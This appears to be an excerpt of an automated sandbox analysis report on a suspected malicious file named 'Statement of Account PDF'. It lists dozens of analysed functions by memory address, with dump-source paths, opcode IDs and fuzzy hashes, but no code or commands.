                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3f4c9c2f041bbb9ab0b3498555da304edc44dffd42da06b59694f235d4b3c1f
                                                        • Instruction ID: 7e6fa49f23294426e93a7e9df1eabfa56f966d53820523574d7f0d679f83528d
                                                        • Opcode Fuzzy Hash: b3f4c9c2f041bbb9ab0b3498555da304edc44dffd42da06b59694f235d4b3c1f
                                                        • Instruction Fuzzy Hash: 6E214D75E0020A9FCB05DFA9C9848EEFBF9FF98300B11C55AE414E7215E774A942CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4D88 Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0b1303cebde3baeb72737b66e4347d8a2dc7a5ca14c77a2c9f8bb9597405b5c4
                                                        • Instruction ID: 3e95a1417b8d7942077fad5a47d53fda526a9b1659cf6c80a5b794660606747e
                                                        • Opcode Fuzzy Hash: 0b1303cebde3baeb72737b66e4347d8a2dc7a5ca14c77a2c9f8bb9597405b5c4
                                                        • Instruction Fuzzy Hash: AF11E475A002058FD710DB69C5458EBBBF6EFC0304B0089A9E616EB391EF75ED098F90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEE0F8 Relevance: .1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 902be0f4b1c44cbe457662227eea7e06eceaa77581a201564054a0600a650f78
                                                        • Instruction ID: cb177730f2ed1343819cf591a2656ab284dbcdaa81d3370bb70e122ff651ecd7
                                                        • Opcode Fuzzy Hash: 902be0f4b1c44cbe457662227eea7e06eceaa77581a201564054a0600a650f78
                                                        • Instruction Fuzzy Hash: D11108317041689FDB18ABBD94142BF7BDAEBC5390B108179D509DB385DE399DC283D0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AE770 Relevance: .1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 249da06c80cd6f93bccb200b6a0094493e8a165ba68d16d338f59d17b3b93bb6
                                                        • Instruction ID: 0231c2b62415692f805613fa347b2561ec858a1c6771b8240e08962b87e62dcd
                                                        • Opcode Fuzzy Hash: 249da06c80cd6f93bccb200b6a0094493e8a165ba68d16d338f59d17b3b93bb6
                                                        • Instruction Fuzzy Hash: E421D2B4D01268EFDB20DF99C585BCEBFF4AB08314F24841AE418BB250C7B55885CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE6D18 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40d5b14abb61fd3f9c00858e0570840f0af08824200c931751fb47242a8ed8d0
                                                        • Instruction ID: 71e89c7ca97608f38192f6f45df881f252e1fc11f0bb7273ffa56a2690318af0
                                                        • Opcode Fuzzy Hash: 40d5b14abb61fd3f9c00858e0570840f0af08824200c931751fb47242a8ed8d0
                                                        • Instruction Fuzzy Hash: CA210B75E0020A9F8B04DFADC8848AFFBF9FF98300B10851AE518E7215E770A946CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE8E60 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fd0b4d90056bcacc1081473fb08a43cec0ad7cd0cd14b672a38e228e6c0a6767
                                                        • Instruction ID: 3ef2aa4167b74d686516c63651ac40fb4303b1cd357eb04d9ddad8b6af70284a
                                                        • Opcode Fuzzy Hash: fd0b4d90056bcacc1081473fb08a43cec0ad7cd0cd14b672a38e228e6c0a6767
                                                        • Instruction Fuzzy Hash: 7C21AC75B006008FCB20EF1AC980EAA77B6BF88724B10442EEA0687762D735FC41CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AC278 Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0cff9e57e455f5ac5cc7ad1f6e891b5a200d51904a400265ae4fb21780277737
                                                        • Instruction ID: 537d66ead622ab084f993134d12c1c2346f1031e5a49f4b9db15b8df56ae4f86
                                                        • Opcode Fuzzy Hash: 0cff9e57e455f5ac5cc7ad1f6e891b5a200d51904a400265ae4fb21780277737
                                                        • Instruction Fuzzy Hash: D92190B4A00A08DFC748DF5AE084A99BFF1FF88310F5290D5D5499B365EB31E995CB05
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00C5D005 Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1696515478.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c5d000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 69df75d156841aad38b4140d112eec7c058b1eaea1251345d5177e783103d13b
                                                        • Instruction ID: d581f1ba92d002a1d22bcde0165bfbd5f7aafa8e6d48bf1f2b1748010fafff59
                                                        • Opcode Fuzzy Hash: 69df75d156841aad38b4140d112eec7c058b1eaea1251345d5177e783103d13b
                                                        • Instruction Fuzzy Hash: 70218E755093808FDB12CF24D994715BF71EB86314F28C5EAD8498F2A7C33A984ACB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEFB80 Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9c26d634d31fcbafef66c7337848d6e4648852fd404a80ae8ce9a16b11c0d3ef
                                                        • Instruction ID: 9d0ffff2121626888d1d3f7b8cf418ede2e313e73c9154e5aa0cba8f3d5e4b3b
                                                        • Opcode Fuzzy Hash: 9c26d634d31fcbafef66c7337848d6e4648852fd404a80ae8ce9a16b11c0d3ef
                                                        • Instruction Fuzzy Hash: A921C9B4E04209DFCB80DFA9D1919AEBBF5EF49301F60A099D819A7711D7309E41CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE0700 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c3c46e1f08a94a05fbe3043d7a22e41a8e5689e1c975854426f731ade53f52f4
                                                        • Instruction ID: e7ae0eaca5418ca42a38a21e548e37dc9d76d86bd8d89c4348fe82527df76349
                                                        • Opcode Fuzzy Hash: c3c46e1f08a94a05fbe3043d7a22e41a8e5689e1c975854426f731ade53f52f4
                                                        • Instruction Fuzzy Hash: 1A115970B006009FC794DF68D89096AB7F2FFC8224B20896DD066DB3A1DB71EC0ACB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE2010 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e7a23200d34a7f495e708482c2e7e7b46bf3f94a4cad54ecc212a6ee9af11cfb
                                                        • Instruction ID: e7a196b4f2ca0a6423bed61f6fe5b0a8ee5c72ce3f64881869450e9ddeb61849
                                                        • Opcode Fuzzy Hash: e7a23200d34a7f495e708482c2e7e7b46bf3f94a4cad54ecc212a6ee9af11cfb
                                                        • Instruction Fuzzy Hash: 8111C131700644CFC764EF39C8A091ABBFAEF8621171005AEE056CB3B0DA36EE85CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE2001 Relevance: .1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 35fac2a2dcb98c66a9f3e69b490a9a325c517856639de6615a26e2993fdb7534
                                                        • Instruction ID: 489c3bb26a56eb5119e4f774884e794f4f4fadd5e5eb56ac35574d47b32c4a81
                                                        • Opcode Fuzzy Hash: 35fac2a2dcb98c66a9f3e69b490a9a325c517856639de6615a26e2993fdb7534
                                                        • Instruction Fuzzy Hash: CC112B327042408FCB649F39D8609697BF5EF9625030901AFE055CB372DA36DE42C751
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE6BA8 Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 895c02edeb8a0b461f41bdecd9a145a074f1706e30f12a65b022f493a6001293
                                                        • Instruction ID: 9fddf9507358304ecd9fe7c0aeb3a8aaf621c076ca291d87a0a3fc76f35cd0a1
                                                        • Opcode Fuzzy Hash: 895c02edeb8a0b461f41bdecd9a145a074f1706e30f12a65b022f493a6001293
                                                        • Instruction Fuzzy Hash: FB11E1343043004FD729DA77C851B7AB3AAEBC4318F94C579E90A8B294CBB5F8468B94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEFC70 Relevance: .1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8da2ce1011c230cf913d2912a9b011a2baa37e27f2c606fcb50875387a7987ec
                                                        • Instruction ID: c33b406db95761d8e7f5490d2333e869a024275768fbe65489913fbc0b059523
                                                        • Opcode Fuzzy Hash: 8da2ce1011c230cf913d2912a9b011a2baa37e27f2c606fcb50875387a7987ec
                                                        • Instruction Fuzzy Hash: 3A115B74E08209EFDB54EFAAC5405ADBBF5FF49310F20959AD81897312D7309A40CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE7EC7 Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5da2431c2b51e10b8a0b8e04a0fb9382ed444ea6af00f8789335d92c427cba38
                                                        • Instruction ID: 67543a2e25e82ffe47638f1555bb1f0e6b5567b93a27bd06367cc83aafa038ba
                                                        • Opcode Fuzzy Hash: 5da2431c2b51e10b8a0b8e04a0fb9382ed444ea6af00f8789335d92c427cba38
                                                        • Instruction Fuzzy Hash: 41117C30A451889FCB08DF78D8504AE7FB2AF81305B2042B9D0188F7E2DE319E55DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEFB90 Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 17a25a2f7373ebbcb5fcd45c369ec84b5d94c762553d0c1a38040938c7a07fbd
                                                        • Instruction ID: 8df02f23130091f2fe723a2feadcdfa0bc3077b6b43cebf34cbd5092a74cfd67
                                                        • Opcode Fuzzy Hash: 17a25a2f7373ebbcb5fcd45c369ec84b5d94c762553d0c1a38040938c7a07fbd
                                                        • Instruction Fuzzy Hash: 6C21EAB4E04109DFCB80DFA9D1809AEBBF5FB48300F60A099D819A7711D730AE41CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AE474 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f74a92304e966539cbea3db08789b5fe371d8c3c81ce68c549aedcebf827fcfe
                                                        • Instruction ID: 31e4eb4a4bb6d622c11bd914b21962a031996215bd81fcca300abd8ff6301b65
                                                        • Opcode Fuzzy Hash: f74a92304e966539cbea3db08789b5fe371d8c3c81ce68c549aedcebf827fcfe
                                                        • Instruction Fuzzy Hash: 842100B5900349EFCB10CF9AD884ADEBBF4FB48320F10842AE919A7211C375A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE2D01 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 334fe3e4c6439481215586d665b949abd0d582e54ccdbce69fed7cccd82635f2
                                                        • Instruction ID: 1b44ed706f8d5d8617300898a4ab62219f56fc96176926a6f9a04462ef4bc8b4
                                                        • Opcode Fuzzy Hash: 334fe3e4c6439481215586d665b949abd0d582e54ccdbce69fed7cccd82635f2
                                                        • Instruction Fuzzy Hash: 9201D6256053844FCB975A38C8507663FBDDFC7150B1700DED182CB262D95C9F06D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEDB21 Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a3b385525d9235fb968adb1c73cdaeeca355e8c59d7fcc7dbd2df10b9088637
                                                        • Instruction ID: 7fe505154e243504449a3c9a355b444f9094c01212d622853c80e8362a0a742f
                                                        • Opcode Fuzzy Hash: 5a3b385525d9235fb968adb1c73cdaeeca355e8c59d7fcc7dbd2df10b9088637
                                                        • Instruction Fuzzy Hash: 651126B2E092479FDF029FA0DC405DEBBBAEF46714F4004A6E000FB086E6782947C751
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EED511 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b8ec14c5f6c0ef3eb482ab5c7b486b986e4f6aea14d2011925e28d298cfbd8ac
                                                        • Instruction ID: f6bce9aa7805adced4156d746080959f24e33071d437537cd3aceb0548a64eda
                                                        • Opcode Fuzzy Hash: b8ec14c5f6c0ef3eb482ab5c7b486b986e4f6aea14d2011925e28d298cfbd8ac
                                                        • Instruction Fuzzy Hash: DC116AB4C08389CFCB11CF9AD844ADEBFF0EF49324F14845AD458A7251C378A949CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEC780 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1fd8429a1c031a3813096169a1eaabc54506c9a4840b99d5938b1145c9230a7e
                                                        • Instruction ID: 55fa37da7050026884a73968fbda1689d4a5e5ba3117f68a1be107ceaf4b30a7
                                                        • Opcode Fuzzy Hash: 1fd8429a1c031a3813096169a1eaabc54506c9a4840b99d5938b1145c9230a7e
                                                        • Instruction Fuzzy Hash: 0B012631B483581FEB04DBBAA8548FD7FEADB86664B1484BBD808C7252ED699D424381
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEA3E0 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a967de738053127843f08f40df36f6c6cd86c03c02968e005a7cf7df2de8a606
                                                        • Instruction ID: 95fe3f69eab0a3da9a67210fb131ced890a4a3265fb15d8947aa4410171161c2
                                                        • Opcode Fuzzy Hash: a967de738053127843f08f40df36f6c6cd86c03c02968e005a7cf7df2de8a606
                                                        • Instruction Fuzzy Hash: 7201B5B194D3498FDB429B65AC651E57FB4DF52314F0540EFC044CB893E638994BC352
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00C5D1CF Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1696515478.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c5d000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction ID: f7ee97f249341c6d146d562eea93dfbbaff600db747b9eefef6e657a7a9ebdcc
                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction Fuzzy Hash: F4118B79504380DFDB16CF14D9C4B15BBA1FB84314F24C6AEDC4A4B696C33AD98ACB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEBE30 Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3f2fe5ebfc02aea25e4db0f401f709cbfc8b186f358f98356f7a2673e81038a0
                                                        • Instruction ID: 6dde5cf649364a486f792070da8fe6e052b38ab2f321b0bdfca5e3054bdcff8f
                                                        • Opcode Fuzzy Hash: 3f2fe5ebfc02aea25e4db0f401f709cbfc8b186f358f98356f7a2673e81038a0
                                                        • Instruction Fuzzy Hash: B71104B5D002489FCB10DF9AD544ADEFBF8EB48320F14841AD859A7210D778A545CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEA948 Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bd1ec3d8f9184b6aae81033bc8de59dd5b743d819c835105f3b780eeff321445
                                                        • Instruction ID: 6fad4b5cff50f969be7e24a2a8bd110a8a4d8cdf90bac1d920e36a149fd8c2f2
                                                        • Opcode Fuzzy Hash: bd1ec3d8f9184b6aae81033bc8de59dd5b743d819c835105f3b780eeff321445
                                                        • Instruction Fuzzy Hash: AD1104B5D006489FDB10DF9AC448ADEFBF4EB88320F14842AE459B7310D374A945CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEFAC2 Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4fefcd00cedd5f4339a7b5f5134b98c3d50a3aabbcd61877206c981fae31284
                                                        • Instruction ID: 20bdef2bd1302e1124307ffeda4aa3cce7921819a2b740b94324eae4827c9d2f
                                                        • Opcode Fuzzy Hash: e4fefcd00cedd5f4339a7b5f5134b98c3d50a3aabbcd61877206c981fae31284
                                                        • Instruction Fuzzy Hash: 9811CA31200B404FD725DF2AD554647BBF2FBC9325F108B6DD0968BBA9DB74A8068B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEB87A Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3caae1c810bed22e6fa8a8247079fc86b842f9ccadfb3d11096562d93ca4936
                                                        • Instruction ID: be01a40a9ddcec7676bd91b10d3c3c9dec12efdccbe4313a3c0731c14a9d2758
                                                        • Opcode Fuzzy Hash: b3caae1c810bed22e6fa8a8247079fc86b842f9ccadfb3d11096562d93ca4936
                                                        • Instruction Fuzzy Hash: BC11FE74D05209DFDB94DFAAD6446BE7BF6FB48300F109569D519A7344D7304E00DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEB880 Relevance: .0, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14d14fa1fcdfe5da0a77381b84d697aa5ef4b5c72d855d8ae64858cbb393cd8c
                                                        • Instruction ID: 22aa44a8379e3450d32487cca5ae24c1b14ec3a19502a425a290fc49fd1347e1
                                                        • Opcode Fuzzy Hash: 14d14fa1fcdfe5da0a77381b84d697aa5ef4b5c72d855d8ae64858cbb393cd8c
                                                        • Instruction Fuzzy Hash: DF11FAB4D09209DFDB94EFAAD6446BEBBFAFB48300F1095A9D519A3344DB305E00DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AE464 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aa96a45ca75d220b95f002502f47c3c900bc4c5328202d9b830aab528575760a
                                                        • Instruction ID: ca7a254a264ef9561a3c249bcf4b294bd1766809ba072f5e314bef2baa6c92e6
                                                        • Opcode Fuzzy Hash: aa96a45ca75d220b95f002502f47c3c900bc4c5328202d9b830aab528575760a
                                                        • Instruction Fuzzy Hash: 84F0FFB2640209BFCF08DFB8E8458EEBFEAEB94210B10C87BE805D7210EA30D8458754
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEC369 Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48efe75ebef7a1bebc6ca9761397b55df3107ccdf35b25343dff190953a6a57b
                                                        • Instruction ID: 5681c7891883db9121c4f2567596054e179b837a8e2cded5ae314f2de8dee08e
                                                        • Opcode Fuzzy Hash: 48efe75ebef7a1bebc6ca9761397b55df3107ccdf35b25343dff190953a6a57b
                                                        • Instruction Fuzzy Hash: E8014470B002555FEB01BBB969904FE7FB6EB88158B00003DE248A7381DE355E039395
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

